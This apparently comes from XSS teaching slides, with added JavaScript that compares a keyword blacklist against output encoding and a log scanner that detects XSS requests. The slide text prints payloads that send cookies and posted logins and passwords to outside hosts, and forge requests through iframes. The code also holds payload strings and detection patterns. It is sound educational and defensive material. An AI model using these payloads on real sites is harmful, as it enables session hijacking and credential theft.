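The following added example (not code from the original slides) serves both the Filtering slide and the syntax list above. It renders the same small profile page twice, once behind a keyword blacklist of the kind the slide calls useless and once with per-context output encoding, and runs the slide's own payloads (the onerror image, the &#x63; entity, the tab inside javascript:, and the A+B eval trick) through each. The page template, the function names and the sample avatar URLs are assumptions made for this example.

```javascript
// Added example, not code from the original slides: the keyword blacklist
// the slide calls useless, beside per-context output encoding, both run over
// the slide's own payloads. The profile-page template, the function names and
// the sample avatar URLs are assumptions made for this example.

// Resolve numeric character references and drop the control characters a
// browser ignores inside a URL scheme, then lower-case: roughly the view the
// browser has of an attribute value, which is what a check must compare
// against (the raw string is not what gets executed).
function normalizeLikeBrowser(s) {
  const cp = (n) => (n > 0 && n <= 0x10ffff ? String.fromCodePoint(n) : "");
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => cp(parseInt(d, 10)))
    .replace(/[\u0000-\u0020]/g, "")
    .toLowerCase();
}

// The naive defence: delete a few keywords from the raw input and hope.
function keywordFilter(input) {
  return input.replace(/<script/gi, "").replace(/javascript:/gi, "").replace(/navigator/gi, "");
}

// Output encoding: one encoder per context the untrusted string lands in.
const HTML_MAP = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function escapeHtml(s) {                 // element text and quoted attributes
  return s.replace(/[&<>"']/g, (c) => HTML_MAP[c]);
}
function escapeJsString(s) {             // inside a double-quoted JS literal
  // JSON.stringify escapes quotes and backslashes; "</" must not end the block
  return JSON.stringify(s).slice(1, -1).replace(/<\//g, "<\\/");
}
function safeUrl(s) {                    // src/href: allow only known schemes
  const n = normalizeLikeBrowser(s);
  return /^(https?:\/\/|\/(?!\/))/.test(n) ? escapeHtml(s) : "#";
}

// The same profile page rendered twice: blacklist only, then encoded per context.
function renderWithFilter(name, avatar) {
  name = keywordFilter(name);
  avatar = keywordFilter(avatar);
  return `<h1>Hello ${name}</h1><img src="${avatar}">` +
         `<script>var user = "${name}";</script>`;
}
function renderEncoded(name, avatar) {
  return `<h1>Hello ${escapeHtml(name)}</h1><img src="${safeUrl(avatar)}">` +
         `<script>var user = "${escapeJsString(name)}";</script>`;
}

// Scan rendered markup for sinks a browser would execute: an event-handler
// attribute or a javascript:/vbscript: URL on any tag. Script bodies are
// skipped (the HTML parser does not see tags inside them); the JS-string
// context is checked separately below.
function executableSinks(html) {
  const markup = html.replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, "");
  const hits = [];
  const tagRe = /<([a-z][\w-]*)\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(markup)) !== null) {
    const [, tag, attrs] = m;
    if (/\bon\w+\s*=/i.test(attrs)) hits.push(`event handler on <${tag}>`);
    const url = /\b(?:src|href)\s*=\s*["']?([^"'\s>]*)/i.exec(attrs);
    if (url && /^(javascript|vbscript):/.test(normalizeLikeBrowser(url[1]))) {
      hits.push(`script URL on <${tag}>`);
    }
  }
  return hits;
}

// True when the JS string literal in the page's script block runs unbroken
// to the template's own closing quote.
const SCRIPT_LITERAL = /var user = "(?:[^"\\]|\\.)*";<\/script>/;

// The slide's payloads, as constructed inputs.
const PAYLOADS = {
  eventHandler:  { name: "<img src=x onerror=alert(document.cookie)>", avatar: "http://cdn.example/a.png" },
  encodedScheme: { name: "alice", avatar: "vbscript:do&#x63;ument.lo&#x63;ation='http://ab.com'" },
  tabInScheme:   { name: "alice", avatar: "javasc&#09;ript:alert('test')" },
  evalConcat:    { name: "\";A='navi';B='gator.userAgent';alert(eval(A+B));//", avatar: "/img/a.png" },
};

function demo() {
  const out = {};
  for (const [k, p] of Object.entries(PAYLOADS)) {
    const filtered = renderWithFilter(p.name, p.avatar);
    const encoded = renderEncoded(p.name, p.avatar);
    out[k] = {
      filteredSinks: executableSinks(filtered).length,
      encodedSinks: executableSinks(encoded).length,
      filteredScriptIntact: SCRIPT_LITERAL.test(filtered),
      encodedScriptIntact: SCRIPT_LITERAL.test(encoded),
    };
  }
  return out;
}
```

Two design points are worth noting. The blacklist never matches the encoded payloads because it compares against the raw string, while the browser compares against the decoded one; safeUrl therefore normalises first and then allowlists schemes rather than denylisting them. The A+B payload produces no markup-level sink at all, which is why the JS-string context needs its own encoder and its own check.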
35
Types of information leakage
Client can reveal cookies to a 3rd party (session state, order info, etc.):
http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'%20+document.cookie</script>
Client can reveal posted form items to a 3rd party (user ID, password, etc.):
<form action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src='http://www.malicioussite.com/'+document.forms(1).login.value+':'+document.forms(1).password.value;"></form>
Client can be tricked into accessing/posting spoofed info to the trusted server:
www.trustedserver.com/xss.asp?name=<iframe src="http://www.trustedserver.com/auth_area/orderupdate?items=4000"></iframe>
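From the defender's side, the three payload families above leave a trace in the web server's access log. The following added example (not code from the original slides) walks access-log lines in the Apache/nginx "combined" format, undoes percent-encoding (including the double-encoding attackers use to slip past naive filters), and flags requests that carry a cookie-exfiltration script, an injected iframe, or an encoded javascript: URL. The hosts, paths, addresses and the log lines themselves are constructed for this example.

```javascript
// Added example, not code from the original slides: a detector that walks
// web-server access-log lines and flags requests carrying the kinds of
// payloads shown above (cookie exfiltration via document.location, an
// iframe forging a request to the trusted server, an encoded javascript:
// URL). The log layout is the Apache/nginx "combined" format; hosts, paths,
// addresses and the log lines themselves are constructed for this example.

const COMBINED = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/;

function parseCombined(line) {
  const m = COMBINED.exec(line);
  if (!m) return null;
  const [, ip, time, method, target, status, referer] = m;
  return { ip, time, method, target, status: Number(status), referer };
}

// Attackers percent-encode, sometimes twice. Decode until the string stops
// changing (bounded), drop the control characters a browser ignores inside a
// scheme (the javasc<TAB>ript trick), and lower-case for matching.
// HTML entities are not resolved here, only percent-encoding.
function normalizeTarget(target) {
  let cur = target.replace(/\+/g, " ");
  for (let i = 0; i < 3; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch (e) { break; }
    if (next === cur) break;
    cur = next;
  }
  return cur.replace(/[\u0000-\u001f]/g, "").toLowerCase();
}

// Indicators in the order they are reported; each maps to a payload family
// from the slide.
const INDICATORS = [
  ["script_tag",        /<\/?script/],
  ["event_handler",     /\bon[a-z]+\s*=/],
  ["script_scheme",     /(javascript|vbscript):/],
  ["cookie_access",     /document\.cookie/],
  ["location_redirect", /(document|window)\.location\s*=|location\.href\s*=/],
  ["iframe_injection",  /<iframe/],
  ["image_beacon",      /new\s+image/],
];

function scanTarget(target) {
  const n = normalizeTarget(target);
  return INDICATORS.filter(([, re]) => re.test(n)).map(([name]) => name);
}

// One finding per flagged request: source address, what was requested, the
// status (a 200 means the reflected payload most likely rendered) and which
// indicators matched.
function scanLog(text) {
  const findings = [];
  for (const line of text.split("\n")) {
    if (!line.trim()) continue;
    const req = parseCombined(line);
    if (!req) continue;
    const indicators = scanTarget(req.target);
    if (indicators.length) {
      findings.push({ ip: req.ip, target: req.target, status: req.status, indicators });
    }
  }
  return findings;
}

// Constructed sample: one benign request, then the three payload families
// (the last one double-encoded, with a %09 tab inside the scheme).
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /a.php?variable=hello HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '198.51.100.23 - - [10/Oct/2023:13:56:01 +0000] "GET /a.php?variable=%22%3E%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fwww.cgisecurity.com%2Fcgi-bin%2Fcookie.cgi%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
  '198.51.100.23 - - [10/Oct/2023:13:56:09 +0000] "GET /xss.asp?name=%3Ciframe%20src%3D%22http%3A%2F%2Fwww.trustedserver.com%2Fauth_area%2Forderupdate%3Fitems%3D4000%22%3E%3C%2Fiframe%3E HTTP/1.1" 200 700 "-" "Mozilla/5.0"',
  '198.51.100.23 - - [10/Oct/2023:13:57:42 +0000] "GET /a.php?variable=%253Cimg%2520src%253D%2522javasc%2509ript%253Aalert(1)%2522%253E HTTP/1.1" 200 580 "-" "Mozilla/5.0"',
].join("\n");
```

Calling scanLog(SAMPLE_LOG) yields three findings, all from 198.51.100.23: the cookie-stealing request matches script_tag, cookie_access and location_redirect; the iframe request matches iframe_injection; the double-encoded request matches script_scheme only after the second decoding pass and the removal of the tab. Indicator matching on decoded request targets is a coarse signal (it catches GET-reflected payloads, not POST bodies or stored payloads), so treat a hit as a lead for looking at the response and the session that followed, not as proof of exploitation.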
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1. http://www.cgisecurity.com/archive/php/phpNuke_cross_site_scripting.txt
2. http://www.cgisecurity.com/archive/php/phpNuke_CSS_5_holes.txt
3. http://www.cgisecurity.com/archive/php/phpNuke_2_more_CSS_holes.txt